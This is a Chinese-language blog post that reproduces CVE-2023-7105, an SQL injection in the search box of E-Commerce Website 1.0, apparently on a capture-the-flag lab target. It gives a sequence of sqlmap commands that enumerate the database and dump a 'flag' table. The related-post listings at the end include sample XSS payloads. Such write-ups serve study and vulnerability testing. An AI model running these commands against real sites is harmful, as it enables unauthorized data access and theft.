E-Commerce Website 搜索框注入漏洞(CVE-2023-7105)

于 2024-08-01 09:02:28 发布
阅读量196 收藏
点赞数 2
分类专栏: # SQL注入 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_23003811/article/details/140838022
版权

一、漏洞概述

E-Commerce Website 1.0 允许通过“index_search.php”中的参数“search”进行 SQL 注入。利用这个问题可能会使攻击者有机会破坏应用程序,访问或修改数据,或者利用底层数据库中的最新漏洞。

二、影响范围

E-Commerce Website 1.0

三、访问页面

四、漏洞复现

1、在页面搜索框任意输入点击搜索。

2、抓包,复制POST包数据到1.txt文件,放到sqlmap工具目录下。

3、执行

sqlmap.py -r 1.txt --batch --dbs

#确定了存在sql注入

4、使用sqlmap获取flag

sqlmap.py -r 1.txt --batch --dbs                    //获取数据库名称
sqlmap.py -r 1.txt --batch -D electricks --tables    //根据数据库名获取表名
sqlmap.py -r 1.txt --batch -D electricks -T flllaaaag --columns    //获取列名
sqlmap.py -r 1.txt --batch -D electricks -T flllaaaag -C flag  --dump //获取列数据

风中追风-fzzf
关注
专栏目录
不能忽视的XSS漏洞搜索框所引起的XSS漏洞
T.E.D on Technology
02-22 4752
引子:我刚入行的时候做过一个小小的页面工具,其中有一个步骤是把一些代码输出到页面上,当时我用的是php做的,写了个for循环,读取每一行的内容,然后echo出来。但是我发现页面排版老是那么的乱,怎么缩进都没有了?有一些代码还显示不出来?这太让我纳闷了,于是问一个学长是怎么一回事,他说:“当然啦,你输出的内容被浏览器解释过后的样子就是这样子的了,比如说你的空格浏览器是不承认的,你要输出空格就得用
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
搜索框——不能忽视的XSS漏洞搜索框所引起的XSS漏洞
06-12
我刚入行的时候做过一个小小的页面工具,其中有一个步骤是把一些代码输出到页面上,当时我用的是php做的,写了个for循环,读取每一行的内容,然后echo出来。但是我发现页面排版老是那么的乱,怎么缩进都没有了?有一些代码还显示不出来?这太让我纳闷了,于是问一个学长是怎么一回事,他说:“当然啦,你输出的内容被浏览器解释过后的样子就是这样子的了,比如说你的空格浏览器是不承认的,你要输出空格就得用nbsp; ……”这时我才反应过来:“哦,原来如此……”。那时我才知道,在html的输出上代码和内容还是得程序员自己去区分的。
网站漏洞挖掘思路
xnxqwzy的博客
10-12 645
未授权访问漏洞,是在攻击者没有获取到登录权限或未授权的情况下,不需要输入密码,即可通过输入网站控制台主页面地址或者不允许查看的连接便可进行访问,同时进行操作。
Xss基础
weixin_62693307的博客
02-23 429
检测关键字(还是和编码绕过一样,但后台源码中加入了其他的东西,例如strpos函数,这个意思是输入的字符串里面必须要有某些特定的字符(http://)而我们可以把它加上在注释掉就行了)通过广撒网或者其它指定的方式,将存储型xss放在具有xss漏洞的网站上,只要有用户去点击,即可进行攻击,也可以自己去找寻攻击对象,所以攻击范围更广。Xss攻击盗取web终端用户的敏感数据,甚至控制用户终端操作;Xss和sql注入攻击的指令都是由黑客通过用户输入域注入的,但xss注入的是html,而sql注入的是sql命令。
web遇到的bug
weixin_62226325的博客
03-04 653
1.部署服务器启动 工件问题 2.ajax提交表单一直为get js错误 return flase 3.jdbc.properties错误 url和 usename 4.过滤器问题 要重写init 5.jdbc模板问题 需要抛出异常 return null 6.BaseServlet问题 需要加上/xxx/* ...
CVE-2022-33891POC Apache Spark 命令注入CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
常见的web漏洞之 sql注入
weixin_47399833的博客
11-17 1806
简单学习一下网络安全
干货 | 这套网站漏洞挖掘(渗透)思路,看完能快速上手
weixin_59191169的博客
04-03 824
本篇主要分享网站各漏洞思路,希望你看完有所收获。
【网络安全】网站漏洞挖掘思路
最新发布
Python84310366的博客
05-10 954
哈喽,大家好,本篇主要分享网站漏洞思路,希望你看完有所收获。
XSS -- 三种基本漏洞 (浅谈)
thj_blog
11-13 7235
一、  XSS 漏洞的验证         我们可以用一段简单的代码,验证和检测漏洞的存在,这样的代码叫做PoC(Proof of Concept)。验证XSS 漏洞存在的PoC 如下:               (1)<script>alert(/xss/)</script>                      (2)<script>confirm('...
xss漏洞总结【插入位置】
qq_45883910的博客
11-04 1213
明天再更新: 靶场:xss-labs 位置一:URL里 位置二:搜索框中 html属性中作为值;绕过方法:闭合。 "><script>alert(1)</script>
常见漏洞所对应功能点记录
m0_46127592的博客
04-23 3764
常见漏洞对应的功能点 一、SQL注入 sql注入是由于数据库执行了人为插入的恶意sql语句,因此存在于和数据库交互的地方,在实际的业务中,和数据库交互的地方一般有一下几个: 1、登录框、注册框 2、搜索框 3、内容浏览 4、内容编辑 5、新增主题、添加用户 标题二、任意文件下载、读取 任意文件下载是由于下载的参数中存在路径,攻击者通过修改参数中的路径达到任意文件下载的目的,一般存在与以下几个地方: 1、下载文件 2、导出excle 三、任意文件上传 任意文件上传是由于在文件上传时对文件类型没有进行一定的限制
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值